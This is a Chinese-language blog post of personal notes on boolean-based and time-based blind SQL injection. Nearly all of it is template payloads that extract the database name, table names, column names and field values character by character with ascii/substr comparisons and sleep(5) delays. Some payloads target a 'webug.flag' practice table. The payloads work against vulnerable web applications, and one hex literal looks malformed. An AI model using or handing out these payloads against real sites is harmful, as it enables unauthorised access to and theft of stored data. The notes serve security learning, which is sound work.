布尔盲注和延时注入笔记

布尔盲注:

格式:?id=1' and (ascii(substr((爆表列字段的语句 limit 0,1),1,1)))=100 --+

爆库:?id=1' and ord(substr(database(), 1, 1))=115 --+

爆表:?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=100 --+

?id=1' and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374 limit 0,1),1,1)))=100 --+

爆列:?id=1' and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374(库名) and TABLE_NAME=0x61646d696e(表名) limit 0,1),1,1)))=100 --+            limit 0,1),4,1)))=102 含义:第4个的ascii码是102  所以应该是f

爆字段:?id=1' and (ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))=100 --+

延时注入:

格式:?id=1' and if( (ascii(substr(( 爆表列字段语句 limit 0,1),1,1)))=100 ,sleep(5),0)--+

爆库:?id=1' and if(ord(substr(database(),1,1))=115,sleep(5),0) --+

爆表:?id=1' and if( (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374(表名) limit 0,1),1,1)))=100 ,sleep(5),0)--+

爆列:?id=1' and if( (ascii(substr(( select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA="webug" and TABLE_NAME="flag" limit 0,1),1,1)))=105 ,sleep(5),0)--+

select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374(库名) and TABLE_NAME=0x61646d696e(表名)

爆字段:?id=1' and if((ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))<100,sleep(5),0)--+

select group_concat(concat(id,0x20,flag,0x20)) from 库.表

ord:返回字符串首个字符的ASCII值

substr:返回截取的字符串 start必须写,length可以不写,默认到字符串结尾

limit:限制查询结果返回的数量

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • pyspark.sql模块 模块上下文 Spark SQL和DataFrames的重要类: pyspark.sql...
    mpro阅读 9,504评论 0 13
  • less-1&2 一打开就来了一句"Please input the ID as parameter with n...
    l0st阅读 4,240评论 0 1
  • MSSQL 跨库查询(臭要饭的!黑夜) 榨干MS SQL最后一滴血 SQL语句参考及记录集对象详解 关于SQL S...
    碧海生曲阅读 5,672评论 0 1
  • web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被...
    查无此人asdasd阅读 7,352评论 0 5
  • Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 713评论 0 3